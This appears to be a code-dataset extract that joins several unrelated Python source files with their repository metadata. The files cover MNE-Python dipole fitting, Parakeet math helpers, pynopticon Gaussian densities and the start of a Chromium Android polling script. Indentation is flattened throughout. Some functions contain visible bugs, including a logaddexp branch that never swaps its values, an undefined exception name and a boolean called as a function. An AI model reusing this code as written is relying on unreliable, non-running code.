data = np.loadtxt(fname, comments='#') # handle 2 types of comments...
name = None
with open(fname, 'r') as fid:
for line in fid.readlines():
if line.startswith('##') or line.startswith('%%'):
m = re.search('Name "(.*) dipoles"', line)
if m:
name = m.group(1)
break
if data.ndim == 1:
data = data[None, :]
logger.info("%d dipole(s) found" % len(data))
times = data[:, 0] / 1000.
pos = 1e-3 * data[:, 2:5] # put data in meters
amplitude = data[:, 5]
norm = amplitude.copy()
amplitude /= 1e9
norm[norm == 0] = 1
ori = data[:, 6:9] / norm[:, np.newaxis]
gof = data[:, 9]
return Dipole(times, pos, amplitude, ori, gof, name)
# #############################################################################
# Fitting
def _dipole_forwards(fwd_data, whitener, rr, n_jobs=1):
"""Compute the forward solution and do other nice stuff"""
B = _compute_forwards_meeg(rr, fwd_data, n_jobs, verbose=False)
B = np.concatenate(B, axis=1)
B_orig = B.copy()
# Apply projection and whiten (cov has projections already)
B = np.dot(B, whitener.T)
# column normalization doesn't affect our fitting, so skip for now
# S = np.sum(B * B, axis=1) # across channels
# scales = np.repeat(3. / np.sqrt(np.sum(np.reshape(S, (len(rr), 3)),
# axis=1)), 3)
# B *= scales[:, np.newaxis]
scales = np.ones(3)
return B, B_orig, scales
def _make_guesses(surf_or_rad, r0, grid, exclude, mindist, n_jobs):
"""Make a guess space inside a sphere or BEM surface"""
if isinstance(surf_or_rad, dict):
surf = surf_or_rad
logger.info('Guess surface (%s) is in %s coordinates'
% (_bem_explain_surface(surf['id']),
_coord_frame_name(surf['coord_frame'])))
else:
radius = surf_or_rad[0]
logger.info('Making a spherical guess space with radius %7.1f mm...'
% (1000 * radius))
surf = _get_ico_surface(3)
_normalize_vectors(surf['rr'])
surf['rr'] *= radius
surf['rr'] += r0
logger.info('Filtering (grid = %6.f mm)...' % (1000 * grid))
src = _make_volume_source_space(surf, grid, exclude, 1000 * mindist,
do_neighbors=False, n_jobs=n_jobs)
# simplify the result to make things easier later
src = dict(rr=src['rr'][src['vertno']], nn=src['nn'][src['vertno']],
nuse=src['nuse'], coord_frame=src['coord_frame'],
vertno=np.arange(src['nuse']))
return SourceSpaces([src])
def _fit_eval(rd, B, B2, fwd_svd=None, fwd_data=None, whitener=None):
"""Calculate the residual sum of squares"""
if fwd_svd is None:
fwd = _dipole_forwards(fwd_data, whitener, rd[np.newaxis, :])[0]
uu, sing, vv = linalg.svd(fwd, overwrite_a=True, full_matrices=False)
else:
uu, sing, vv = fwd_svd
gof = _dipole_gof(uu, sing, vv, B, B2)[0]
# mne-c uses fitness=B2-Bm2, but ours (1-gof) is just a normalized version
return 1. - gof
def _dipole_gof(uu, sing, vv, B, B2):
"""Calculate the goodness of fit from the forward SVD"""
ncomp = 3 if sing[2] / sing[0] > 0.2 else 2
one = np.dot(vv[:ncomp], B)
Bm2 = np.sum(one * one)
gof = Bm2 / B2
return gof, one
def _fit_Q(fwd_data, whitener, proj_op, B, B2, B_orig, rd, ori=None):
"""Fit the dipole moment once the location is known"""
if 'fwd' in fwd_data:
# should be a single precomputed "guess" (i.e., fixed position)
assert rd is None
fwd = fwd_data['fwd']
assert fwd.shape[0] == 3
fwd_orig = fwd_data['fwd_orig']
assert fwd_orig.shape[0] == 3
scales = fwd_data['scales']
assert scales.shape == (3,)
fwd_svd = fwd_data['fwd_svd'][0]
else:
fwd, fwd_orig, scales = _dipole_forwards(fwd_data, whitener,
rd[np.newaxis, :])
fwd_svd = None
if ori is None:
if fwd_svd is None:
fwd_svd = linalg.svd(fwd, full_matrices=False)
uu, sing, vv = fwd_svd
gof, one = _dipole_gof(uu, sing, vv, B, B2)
ncomp = len(one)
# Counteract the effect of column normalization
Q = scales[0] * np.sum(uu.T[:ncomp] *
(one / sing[:ncomp])[:, np.newaxis], axis=0)
else:
fwd = np.dot(ori[np.newaxis], fwd)
sing = np.linalg.norm(fwd)
one = np.dot(fwd / sing, B)
gof = (one * one)[0] / B2
Q = ori * (scales[0] * np.sum(one / sing))
B_residual = _compute_residual(proj_op, B_orig, fwd_orig, Q)
return Q, gof, B_residual
def _compute_residual(proj_op, B_orig, fwd_orig, Q):
"""Compute the residual"""
# apply the projector to both elements
return np.dot(proj_op, B_orig) - np.dot(np.dot(Q, fwd_orig), proj_op.T)
def _fit_dipoles(fun, min_dist_to_inner_skull, data, times, guess_rrs,
guess_data, fwd_data, whitener, proj_op, ori, n_jobs):
"""Fit a single dipole to the given whitened, projected data"""
from scipy.optimize import fmin_cobyla
parallel, p_fun, _ = parallel_func(fun, n_jobs)
# parallel over time points
res = parallel(p_fun(min_dist_to_inner_skull, B, t, guess_rrs,
guess_data, fwd_data, whitener, proj_op,
fmin_cobyla, ori)
for B, t in zip(data.T, times))
pos = np.array([r[0] for r in res])
amp = np.array([r[1] for r in res])
ori = np.array([r[2] for r in res])
gof = np.array([r[3] for r in res]) * 100 # convert to percentage
residual = np.array([r[4] for r in res]).T
return pos, amp, ori, gof, residual
'''Simplex code in case we ever want/need it for testing
def _make_tetra_simplex():
"""Make the initial tetrahedron"""
#
# For this definition of a regular tetrahedron, see
#
# http://mathworld.wolfram.com/Tetrahedron.html
#
x = np.sqrt(3.0) / 3.0
r = np.sqrt(6.0) / 12.0
R = 3 * r
d = x / 2.0
simplex = 1e-2 * np.array([[x, 0.0, -r],
[-d, 0.5, -r],
[-d, -0.5, -r],
[0., 0., R]])
return simplex
def try_(p, y, psum, ndim, fun, ihi, neval, fac):
"""Helper to try a value"""
ptry = np.empty(ndim)
fac1 = (1.0 - fac) / ndim
fac2 = fac1 - fac
ptry = psum * fac1 - p[ihi] * fac2
ytry = fun(ptry)
neval += 1
if ytry < y[ihi]:
y[ihi] = ytry
psum[:] += ptry - p[ihi]
p[ihi] = ptry
return ytry, neval
def _simplex_minimize(p, ftol, stol, fun, max_eval=1000):
"""Minimization with the simplex algorithm
Modified from Numerical recipes"""
y = np.array([fun(s) for s in p])
ndim = p.shape[1]
assert p.shape[0] == ndim + 1
mpts = ndim + 1
neval = 0
psum = p.sum(axis=0)
loop = 1
while(True):
ilo = 1
if y[1] > y[2]:
ihi = 1
inhi = 2
else:
ihi = 2
inhi = 1
for i in range(mpts):
if y[i] < y[ilo]:
ilo = i
if y[i] > y[ihi]:
inhi = ihi
ihi = i
elif y[i] > y[inhi]:
if i != ihi:
inhi = i
rtol = 2 * np.abs(y[ihi] - y[ilo]) / (np.abs(y[ihi]) + np.abs(y[ilo]))
if rtol < ftol:
break
if neval >= max_eval:
raise RuntimeError('Maximum number of evaluations exceeded.')
if stol > 0: # Has the simplex collapsed?
dsum = np.sqrt(np.sum((p[ilo] - p[ihi]) ** 2))
if loop > 5 and dsum < stol:
break
ytry, neval = try_(p, y, psum, ndim, fun, ihi, neval, -1.)
if ytry <= y[ilo]:
ytry, neval = try_(p, y, psum, ndim, fun, ihi, neval, 2.)
elif ytry >= y[inhi]:
ysave = y[ihi]
ytry, neval = try_(p, y, psum, ndim, fun, ihi, neval, 0.5)
if ytry >= ysave:
for i in range(mpts):
if i != ilo:
psum[:] = 0.5 * (p[i] + p[ilo])
p[i] = psum
y[i] = fun(psum)
neval += ndim
psum = p.sum(axis=0)
loop += 1
'''
def _surface_constraint(rd, surf, min_dist_to_inner_skull):
"""Surface fitting constraint"""
dist = _compute_nearest(surf['rr'], rd[np.newaxis, :],
return_dists=True)[1][0]
if _points_outside_surface(rd[np.newaxis, :], surf, 1)[0]:
dist *= -1.
# Once we know the dipole is below the inner skull,
# let's check if its distance to the inner skull is at least
# min_dist_to_inner_skull. This can be enforced by adding a
# constrain proportional to its distance.
dist -= min_dist_to_inner_skull
return dist
def _sphere_constraint(rd, r0, R_adj):
"""Sphere fitting constraint"""
return R_adj - np.sqrt(np.sum((rd - r0) ** 2))
def _fit_dipole(min_dist_to_inner_skull, B_orig, t, guess_rrs,
guess_data, fwd_data, whitener, proj_op,
fmin_cobyla, ori):
"""Fit a single bit of data"""
B = np.dot(whitener, B_orig)
# make constraint function to keep the solver within the inner skull
if isinstance(fwd_data['inner_skull'], dict): # bem
surf = fwd_data['inner_skull']
constraint = partial(_surface_constraint, surf=surf,
min_dist_to_inner_skull=min_dist_to_inner_skull)
else: # sphere
surf = None
R, r0 = fwd_data['inner_skull']
constraint = partial(_sphere_constraint, r0=r0,
R_adj=R - min_dist_to_inner_skull)
del R, r0
# Find a good starting point (find_best_guess in C)
B2 = np.dot(B, B)
if B2 == 0:
warn('Zero field found for time %s' % t)
return np.zeros(3), 0, np.zeros(3), 0
idx = np.argmin([_fit_eval(guess_rrs[[fi], :], B, B2, fwd_svd)
for fi, fwd_svd in enumerate(guess_data['fwd_svd'])])
x0 = guess_rrs[idx]
fun = partial(_fit_eval, B=B, B2=B2, fwd_data=fwd_data, whitener=whitener)
# Tested minimizers:
# Simplex, BFGS, CG, COBYLA, L-BFGS-B, Powell, SLSQP, TNC
# Several were similar, but COBYLA won for having a handy constraint
# function we can use to ensure we stay inside the inner skull /
# smallest sphere
rd_final = fmin_cobyla(fun, x0, (constraint,), consargs=(),
rhobeg=5e-2, rhoend=5e-5, disp=False)
# simplex = _make_tetra_simplex() + x0
# _simplex_minimize(simplex, 1e-4, 2e-4, fun)
# rd_final = simplex[0]
# Compute the dipole moment at the final point
Q, gof, residual = _fit_Q(fwd_data, whitener, proj_op, B, B2, B_orig,
rd_final, ori=ori)
amp = np.sqrt(np.dot(Q, Q))
norm = 1. if amp == 0. else amp
ori = Q / norm
msg = '---- Fitted : %7.1f ms' % (1000. * t)
if surf is not None:
dist_to_inner_skull = _compute_nearest(
surf['rr'], rd_final[np.newaxis, :], return_dists=True)[1][0]
msg += (", distance to inner skull : %2.4f mm"
% (dist_to_inner_skull * 1000.))
logger.info(msg)
return rd_final, amp, ori, gof, residual
def _fit_dipole_fixed(min_dist_to_inner_skull, B_orig, t, guess_rrs,
guess_data, fwd_data, whitener, proj_op,
fmin_cobyla, ori):
"""Fit a data using a fixed position"""
B = np.dot(whitener, B_orig)
B2 = np.dot(B, B)
if B2 == 0:
warn('Zero field found for time %s' % t)
return np.zeros(3), 0, np.zeros(3), 0
# Compute the dipole moment
Q, gof, residual = _fit_Q(guess_data, whitener, proj_op, B, B2, B_orig,
rd=None, ori=ori)
if ori is None:
amp = np.sqrt(np.dot(Q, Q))
norm = 1. if amp == 0. else amp
ori = Q / norm
else:
amp = np.dot(Q, ori)
# No corresponding 'logger' message here because it should go *very* fast
return guess_rrs[0], amp, ori, gof, residual
@verbose
def fit_dipole(evoked, cov, bem, trans=None, min_dist=5., n_jobs=1,
pos=None, ori=None, verbose=None):
"""Fit a dipole
Parameters
----------
evoked : instance of Evoked
The dataset to fit.
cov : str | instance of Covariance
The noise covariance.
bem : str | dict
The BEM filename (str) or a loaded sphere model (dict).
trans : str | None
The head<->MRI transform filename. Must be provided unless BEM
is a sphere model.
min_dist : float
Minimum distance (in milimeters) from the dipole to the inner skull.
Must be positive. Note that because this is a constraint passed to
a solver it is not strict but close, i.e. for a ``min_dist=5.`` the
fits could be 4.9 mm from the inner skull.
n_jobs : int
Number of jobs to run in parallel (used in field computation
and fitting).
pos : ndarray, shape (3,) | None
Position of the dipole to use. If None (default), sequential
fitting (different position and orientation for each time instance)
is performed. If a position (in head coords) is given as an array,
the position is fixed during fitting.
.. versionadded:: 0.12
ori : ndarray, shape (3,) | None
Orientation of the dipole to use. If None (default), the
orientation is free to change as a function of time. If an
orientation (in head coordinates) is given as an array, ``pos``
must also be provided, and the routine computes the amplitude and
goodness of fit of the dipole at the given position and orientation
for each time instant.
.. versionadded:: 0.12
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
Returns
-------
dip : instance of Dipole or DipoleFixed
The dipole fits. A :class:`mne.DipoleFixed` is returned if
``pos`` and ``ori`` are both not None.
residual : ndarray, shape (n_meeg_channels, n_times)
The good M-EEG data channels with the fitted dipolar activity
removed.
See Also
--------
mne.beamformer.rap_music
Notes
-----
.. versionadded:: 0.9.0
"""
# This could eventually be adapted to work with other inputs, these
# are what is needed:
evoked = evoked.copy()
# Determine if a list of projectors has an average EEG ref
if _needs_eeg_average_ref_proj(evoked.info):
raise ValueError('EEG average reference is mandatory for dipole '
'fitting.')
if min_dist < 0:
raise ValueError('min_dist should be positive. Got %s' % min_dist)
if ori is not None and pos is None:
raise ValueError('pos must be provided if ori is not None')
data = evoked.data
info = evoked.info
times = evoked.times.copy()
comment = evoked.comment
# Convert the min_dist to meters
min_dist_to_inner_skull = min_dist / 1000.
del min_dist
# Figure out our inputs
neeg = len(pick_types(info, meg=False, eeg=True, exclude=[]))
if isinstance(bem, string_types):
logger.info('BEM : %s' % bem)
if trans is not None:
logger.info('MRI transform : %s' % trans)
mri_head_t, trans = _get_trans(trans)
else:
mri_head_t = Transform('head', 'mri', np.eye(4))
bem = _setup_bem(bem, bem, neeg, mri_head_t, verbose=False)
if not bem['is_sphere']:
if trans is None:
raise ValueError('mri must not be None if BEM is provided')
# Find the best-fitting sphere
inner_skull = _bem_find_surface(bem, 'inner_skull')
inner_skull = inner_skull.copy()
R, r0 = _fit_sphere(inner_skull['rr'], disp=False)
# r0 back to head frame for logging
r0 = apply_trans(mri_head_t['trans'], r0[np.newaxis, :])[0]
logger.info('Head origin : '
'%6.1f %6.1f %6.1f mm rad = %6.1f mm.'
% (1000 * r0[0], 1000 * r0[1], 1000 * r0[2], 1000 * R))
else:
r0 = bem['r0']
if len(bem.get('layers', [])) > 0:
R = bem['layers'][0]['rad']
kind = 'rad'
else: # MEG-only
# Use the minimum distance to the MEG sensors as the radius then
R = np.dot(linalg.inv(info['dev_head_t']['trans']),
np.hstack([r0, [1.]]))[:3] # r0 -> device
R = R - [info['chs'][pick]['loc'][:3]
for pick in pick_types(info, meg=True, exclude=[])]
if len(R) == 0:
raise RuntimeError('No MEG channels found, but MEG-only '
'sphere model used')
R = np.min(np.sqrt(np.sum(R * R, axis=1))) # use dist to sensors
kind = 'max_rad'
logger.info('Sphere model : origin at (% 7.2f % 7.2f % 7.2f) mm, '
'%s = %6.1f mm'
% (1000 * r0[0], 1000 * r0[1], 1000 * r0[2], kind, R))
inner_skull = [R, r0] # NB sphere model defined in head frame
r0_mri = apply_trans(invert_transform(mri_head_t)['trans'],
r0[np.newaxis, :])[0]
accurate = False # can be an option later (shouldn't make big diff)
# Deal with DipoleFixed cases here
if pos is not None:
fixed_position = True
pos = np.array(pos, float)
if pos.shape != (3,):
raise ValueError('pos must be None or a 3-element array-like,'
' got %s' % (pos,))
logger.info('Fixed position : %6.1f %6.1f %6.1f mm'
% tuple(1000 * pos))
if ori is not None:
ori = np.array(ori, float)
if ori.shape != (3,):
raise ValueError('oris must be None or a 3-element array-like,'
' got %s' % (ori,))
norm = np.sqrt(np.sum(ori * ori))
if not np.isclose(norm, 1):
raise ValueError('ori must be a unit vector, got length %s'
% (norm,))
logger.info('Fixed orientation : %6.4f %6.4f %6.4f mm'
% tuple(ori))
else:
logger.info('Free orientation : <time-varying>')
fit_n_jobs = 1 # only use 1 job to do the guess fitting
else:
fixed_position = False
# Eventually these could be parameters, but they are just used for
# the initial grid anyway
guess_grid = 0.02 # MNE-C uses 0.01, but this is faster w/similar perf
guess_mindist = max(0.005, min_dist_to_inner_skull)
guess_exclude = 0.02
logger.info('Guess grid : %6.1f mm' % (1000 * guess_grid,))
if guess_mindist > 0.0:
logger.info('Guess mindist : %6.1f mm'
% (1000 * guess_mindist,))
if guess_exclude > 0:
logger.info('Guess exclude : %6.1f mm'
% (1000 * guess_exclude,))
logger.info('Using %s MEG coil definitions.'
% ("accurate" if accurate else "standard"))
fit_n_jobs = n_jobs
if isinstance(cov, string_types):
logger.info('Noise covariance : %s' % (cov,))
cov = read_cov(cov, verbose=False)
logger.info('')
_print_coord_trans(mri_head_t)
_print_coord_trans(info['dev_head_t'])
logger.info('%d bad channels total' % len(info['bads']))
# Forward model setup (setup_forward_model from setup.c)
ch_types = [channel_type(info, idx) for idx in range(info['nchan'])]
megcoils, compcoils, megnames, meg_info = [], [], [], None
eegels, eegnames = [], []
if 'grad' in ch_types or 'mag' in ch_types:
megcoils, compcoils, megnames, meg_info = \
_prep_meg_channels(info, exclude='bads',
accurate=accurate, verbose=verbose)
if 'eeg' in ch_types:
eegels, eegnames = _prep_eeg_channels(info, exclude='bads',
verbose=verbose)
# Ensure that MEG and/or EEG channels are present
if len(megcoils + eegels) == 0:
raise RuntimeError('No MEG or EEG channels found.')
# Whitener for the data
logger.info('Decomposing the sensor noise covariance matrix...')
picks = pick_types(info, meg=True, eeg=True)
# In case we want to more closely match MNE-C for debugging:
# from .io.pick import pick_info
# from .cov import prepare_noise_cov
# info_nb = pick_info(info, picks)
# cov = prepare_noise_cov(cov, info_nb, info_nb['ch_names'], verbose=False)
# nzero = (cov['eig'] > 0)
# n_chan = len(info_nb['ch_names'])
# whitener = np.zeros((n_chan, n_chan), dtype=np.float)
# whitener[nzero, nzero] = 1.0 / np.sqrt(cov['eig'][nzero])
# whitener = np.dot(whitener, cov['eigvec'])
whitener = _get_whitener_data(info, cov, picks, verbose=False)
# Proceed to computing the fits (make_guess_data)
if fixed_position:
guess_src = dict(nuse=1, rr=pos[np.newaxis], inuse=np.array([True]))
logger.info('Compute forward for dipole location...')
else:
logger.info('\n---- Computing the forward solution for the guesses...')
guess_src = _make_guesses(inner_skull, r0_mri,
guess_grid, guess_exclude, guess_mindist,
n_jobs=n_jobs)[0]
# grid coordinates go from mri to head frame
transform_surface_to(guess_src, 'head', mri_head_t)
logger.info('Go through all guess source locations...')
# inner_skull goes from mri to head frame
if isinstance(inner_skull, dict):
transform_surface_to(inner_skull, 'head', mri_head_t)
if fixed_position:
if isinstance(inner_skull, dict):
check = _surface_constraint(pos, inner_skull,
min_dist_to_inner_skull)
else:
check = _sphere_constraint(pos, r0,
R_adj=R - min_dist_to_inner_skull)
if check <= 0:
raise ValueError('fixed position is %0.1fmm outside the inner '
'skull boundary' % (-1000 * check,))
# C code computes guesses w/sphere model for speed, don't bother here
fwd_data = dict(coils_list=[megcoils, eegels], infos=[meg_info, None],
ccoils_list=[compcoils, None], coil_types=['meg', 'eeg'],
inner_skull=inner_skull)
# fwd_data['inner_skull'] in head frame, bem in mri, confusing...
_prep_field_computation(guess_src['rr'], bem, fwd_data, n_jobs,
verbose=False)
guess_fwd, guess_fwd_orig, guess_fwd_scales = _dipole_forwards(
fwd_data, whitener, guess_src['rr'], n_jobs=fit_n_jobs)
# decompose ahead of time
guess_fwd_svd = [linalg.svd(fwd, overwrite_a=False, full_matrices=False)
for fwd in np.array_split(guess_fwd,
len(guess_src['rr']))]
guess_data = dict(fwd=guess_fwd, fwd_svd=guess_fwd_svd,
fwd_orig=guess_fwd_orig, scales=guess_fwd_scales)
del guess_fwd, guess_fwd_svd, guess_fwd_orig, guess_fwd_scales # destroyed
pl = '' if guess_src['nuse'] == 1 else 's'
logger.info('[done %d source%s]' % (guess_src['nuse'], pl))
# Do actual fits
data = data[picks]
ch_names = [info['ch_names'][p] for p in picks]
proj_op = make_projector(info['projs'], ch_names, info['bads'])[0]
fun = _fit_dipole_fixed if fixed_position else _fit_dipole
out = _fit_dipoles(
fun, min_dist_to_inner_skull, data, times, guess_src['rr'],
guess_data, fwd_data, whitener, proj_op, ori, n_jobs)
if fixed_position and ori is not None:
# DipoleFixed
data = np.array([out[1], out[3]])
out_info = deepcopy(info)
loc = np.concatenate([pos, ori, np.zeros(6)])
out_info['chs'] = [
dict(ch_name='dip 01', loc=loc, kind=FIFF.FIFFV_DIPOLE_WAVE,
coord_frame=FIFF.FIFFV_COORD_UNKNOWN, unit=FIFF.FIFF_UNIT_AM,
coil_type=FIFF.FIFFV_COIL_DIPOLE,
unit_mul=0, range=1, cal=1., scanno=1, logno=1),
dict(ch_name='goodness', loc=np.zeros(12),
kind=FIFF.FIFFV_GOODNESS_FIT, unit=FIFF.FIFF_UNIT_AM,
coord_frame=FIFF.FIFFV_COORD_UNKNOWN,
coil_type=FIFF.FIFFV_COIL_NONE,
unit_mul=0, range=1., cal=1., scanno=2, logno=100)]
for key in ['hpi_meas', 'hpi_results', 'projs']:
out_info[key] = list()
for key in ['acq_pars', 'acq_stim', 'description', 'dig',
'experimenter', 'hpi_subsystem', 'proj_id', 'proj_name',
'subject_info']:
out_info[key] = None
out_info._update_redundant()
out_info._check_consistency()
dipoles = DipoleFixed(out_info, data, times, evoked.nave,
evoked._aspect_kind, evoked.first, evoked.last,
comment)
else:
dipoles = Dipole(times, out[0], out[1], out[2], out[3], comment)
residual = out[4]
logger.info('%d time points fitted' % len(dipoles.times))
return dipoles, residual
|
wronk/mne-python
|
mne/dipole.py
|
Python
|
bsd-3-clause
| 38,186
|
[
"Mayavi"
] |
afe09af55627b3c509515b0be0971fbeb2567f84d9d711fda039c8f16cc577ab
|
from ..frontend import jit
import numpy as np
@jit
def conjugate(x):
"""
For now we don't have complex numbers so this is just the identity function
"""
return x
@jit
def real(x):
"""
For now we don't have complex types, so real is just the identity function
"""
return x
def _scalar_sign(x):
if x > 0:
return 1
elif x < 0:
return -1
else:
return 0
@jit
def sign(x):
return map(_scalar_sign, x)
@jit
def reciprocal(x):
return 1 / x
@jit
def rad2deg(rad):
return rad * 180 / 3.141592653589793
@jit
def deg2rad(deg):
return deg * 3.141592653589793 / 180
@jit
def hypot(x,y):
return np.sqrt(x**2 + y**2)
@jit
def square(x):
return x * x
def _logaddexp_scalar(x, y):
"""
Copied from BioPython (http://biopython.org/)
"""
if x < y:
bigger = x
smaller = y
else:
bigger = x
smaller = y
diff = smaller - bigger
if diff < -100:
return bigger
return bigger + np.log1p(np.exp(diff))
@jit
def logaddexp(x, y):
return map(_logaddexp_scalar, x, y)
@jit
def log2_1p(x):
return (1.0 / np.log(2)) * np.log1p(x)
@jit
def logaddexp2(x, y):
diff = x - y
return np.where(diff > 0, x + log2_1p(2 ** -diff) , y + log2_1p(2 ** diff))
@jit
def true_divide(x, y):
"""
Not exactly true divide, since I guess it's sometimes supposed to stay an int
"""
return (x + 0.0) / (y + 0.0)
@jit
def floor_divide(x, y):
return np.floor(x / y)
|
pombredanne/parakeet
|
parakeet/lib/math.py
|
Python
|
bsd-3-clause
| 1,470
|
[
"Biopython"
] |
b11e8fc4f0276fbe94bae26e8b98c102e64ebd5af802c0db4edbb611f5723ba2
|
#! /usr/bin/python
#
# Copyrighted David Cournapeau
# Last Change: Sat Jun 02 07:00 PM 2007 J
# New version, with default numpy ordering.
import numpy as N
import numpy.linalg as lin
from numpy.random import randn
from scipy.stats import chi2
# Error classes
class DenError(Exception):
"""Base class for exceptions in this module.
Attributes:
expression -- input expression in which the error occurred
message -- explanation of the error"""
def __init__(self, message):
self.message = message
def __str__(self):
return self.message
#============
# Public API
#============
# The following function do all the fancy stuff to check that parameters
# are Ok, and call the right implementation if args are OK.
def gauss_den(x, mu, va, log = False, axis = -1):
""" Compute multivariate Gaussian density at points x for
mean mu and variance va along specified axis:
requirements:
* mean must be rank 0 (1d) or rank 1 (multi variate gaussian)
* va must be rank 0 (1d), rank 1(multi variate, diag covariance) or rank 2
(multivariate, full covariance).
* in 1 dimension case, any rank for mean and va is ok, as long as their size
is 1 (eg they contain only 1 element)
Caution: if x is rank 1, it is assumed you have a 1d problem. You cannot compute
the gaussian densities of only one sample of dimension d; for this, you have
to use a rank 2 !
If log is True, than the log density is returned
(useful for underflow ?)"""
# If data is rank 1, then we have 1 dimension problem.
if x.ndim == 1:
d = 1
n = x.size
if not N.size(mu) == 1:
raise DenError("for 1 dimension problem, mean must have only one element")
if not N.size(va) == 1:
raise DenError("for 1 dimension problem, mean must have only one element")
return _scalar_gauss_den(x, mu, va, log)
# If data is rank 2, then we may have 1 dimension or multi-variate problem
elif x.ndim == 2:
oaxis = (axis + 1) % 2
n = x.shape[axis]
d = x.shape[oaxis]
# Get away with 1d case now
if d == 1:
return _scalar_gauss_den(x, mu, va, log)
# Now, d > 1 (numpy attributes should be valid on mean and va now)
if not N.size(mu) == d or not mu.ndim == 1:
raise DenError("data is %d dimension, but mean's shape is %s" \
% (d, N.shape(mu)) + " (should be (%d,))" % d)
isfull = (va.ndim == 2)
if not (N.size(va) == d or (isfull and va.shape[0] == va.shape[1] == d)):
raise DenError("va has an invalid shape or number of elements")
if isfull:
# Compute along rows
if oaxis == 0:
return _full_gauss_den(x, mu[:, N.newaxis], va, log, axis)
else:
return _full_gauss_den(x, mu, va, log, axis)
else:
return _diag_gauss_den(x, mu, va, log, axis)
else:
raise RuntimeError("Sorry, only rank up to 2 supported")
# To plot a confidence ellipse from multi-variate gaussian pdf
def gauss_ell(mu, va, dim = [0, 1], npoints = 100, level = 0.39):
""" Given a mean and covariance for multi-variate
gaussian, returns npoints points for the ellipse
of confidence given by level (all points will be inside
the ellipsoides with a probability equal to level)
Returns the coordinate x and y of the ellipse"""
c = N.array(dim)
if mu.size < 2:
raise RuntimeError("this function only make sense for dimension 2 and more")
if mu.size == va.size:
mode = 'diag'
else:
if va.ndim == 2:
if va.shape[0] == va.shape[1]:
mode = 'full'
else:
raise DenError("variance not square")
else:
raise DenError("mean and variance are not dim conformant")
# If X ~ N(mu, va), then [X` * va^(-1/2) * X] ~ Chi2
chi22d = chi2(2)
mahal = N.sqrt(chi22d.ppf(level))
# Generates a circle of npoints
theta = N.linspace(0, 2 * N.pi, npoints)
circle = mahal * N.array([N.cos(theta), N.sin(theta)])
# Get the dimension which we are interested in:
mu = mu[dim]
if mode == 'diag':
va = va[dim]
elps = N.outer(mu, N.ones(npoints))
elps += N.dot(N.diag(N.sqrt(va)), circle)
elif mode == 'full':
va = va[c,:][:,c]
# Method: compute the cholesky decomp of each cov matrix, that is
# compute cova such as va = cova * cova'
# WARN: scipy is different than matlab here, as scipy computes a lower
# triangular cholesky decomp:
# - va = cova * cova' (scipy)
# - va = cova' * cova (matlab)
# So take care when comparing results with matlab !
cova = lin.cholesky(va)
elps = N.outer(mu, N.ones(npoints))
elps += N.dot(cova, circle)
else:
raise DenParam("var mode not recognized")
return elps[0, :], elps[1, :]
#=============
# Private Api
#=============
# Those 3 functions do almost all the actual computation
def _scalar_gauss_den(x, mu, va, log):
""" This function is the actual implementation
of gaussian pdf in scalar case. It assumes all args
are conformant, so it should not be used directly
Call gauss_den instead"""
inva = 1/va
fac = (2*N.pi) ** (-1/2.0) * N.sqrt(inva)
y = ((x-mu) ** 2) * -0.5 * inva
if not log:
y = fac * N.exp(y.ravel())
else:
y = y + log(fac)
return y
def _diag_gauss_den(x, mu, va, log, axis):
""" This function is the actual implementation
of gaussian pdf in scalar case. It assumes all args
are conformant, so it should not be used directly
Call gauss_den instead"""
# Diagonal matrix case
d = mu.size
if axis % 2 == 0:
x = N.swapaxes(x, 0, 1)
if not log:
inva = 1/va[0]
fac = (2*N.pi) ** (-d/2.0) * N.sqrt(inva)
y = (x[0] - mu[0]) ** 2 * inva * -0.5
for i in range(1, d):
inva = 1/va[i]
fac *= N.sqrt(inva)
y += (x[i] - mu[i]) ** 2 * inva * -0.5
y = fac * N.exp(y)
else:
y = _scalar_gauss_den(x[0], mu[0], va[0], log)
for i in range(1, d):
y += _scalar_gauss_den(x[i], mu[i], va[i], log)
return y
def _full_gauss_den(x, mu, va, log, axis):
""" This function is the actual implementation
of gaussian pdf in full matrix case.
It assumes all args are conformant, so it should
not be used directly Call gauss_den instead
Does not check if va is definite positive (on inversible
for that matter), so the inverse computation and/or determinant
would throw an exception."""
d = mu.size
inva = lin.inv(va)
fac = 1 / N.sqrt( (2*N.pi) ** d * N.fabs(lin.det(va)))
# # Slow version (does not work since version 0.6)
# n = N.size(x, 0)
# y = N.zeros(n)
# for i in range(n):
# y[i] = N.dot(x[i,:],
# N.dot(inva, N.transpose(x[i,:])))
# y *= -0.5
# we are using a trick with sum to "emulate"
# the matrix multiplication inva * x without any explicit loop
if axis % 2 == 1:
y = N.dot(inva, (x-mu))
y = -0.5 * N.sum(y * (x-mu), 0)
else:
y = N.dot((x-mu), inva)
y = -0.5 * N.sum(y * (x-mu), 1)
if not log:
y = fac * N.exp(y)
else:
y = y + N.log(fac)
return y
if __name__ == "__main__":
import pylab
#=========================================
# Test plotting a simple diag 2d variance:
#=========================================
va = N.array([5, 3])
mu = N.array([2, 3])
# Generate a multivariate gaussian of mean mu and covariance va
X = randn(2, 1e3)
Yc = N.dot(N.diag(N.sqrt(va)), X)
Yc = Yc.transpose() + mu
# Plotting
Xe, Ye = gauss_ell(mu, va, npoints = 100)
pylab.figure()
pylab.plot(Yc[:, 0], Yc[:, 1], '.')
pylab.plot(Xe, Ye, 'r')
#=========================================
# Test plotting a simple full 2d variance:
#=========================================
va = N.array([[0.2, 0.1],[0.1, 0.5]])
mu = N.array([0, 3])
# Generate a multivariate gaussian of mean mu and covariance va
X = randn(1e3, 2)
Yc = N.dot(lin.cholesky(va), X.transpose())
Yc = Yc.transpose() + mu
# Plotting
Xe, Ye = gauss_ell(mu, va, npoints = 100, level=0.95)
pylab.figure()
pylab.plot(Yc[:, 0], Yc[:, 1], '.')
pylab.plot(Xe, Ye, 'r')
pylab.show()
|
jhmadhav/pynopticon
|
src/em/densities2.py
|
Python
|
gpl-3.0
| 8,876
|
[
"Gaussian"
] |
663e2aa33a1eb70d814eb973351f686c88e461a07ca9150e27e9705d3466941a
|
#!/usr/bin/python
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# 'top'-like memory/network polling for Android apps.
import argparse
import curses
import os
import re
import sys
import time
from operator import sub
_SRC_PATH = os.path.abspath(os.path.join(
os.path.dirname(__file__), '..', '..'))
sys.path.append(os.path.join(_SRC_PATH, 'third_party', 'catapult', 'devil'))
from devil.android import device_errors
from devil.android import device_utils
sys.path.append(os.path.join(_SRC_PATH, 'build', 'android'))
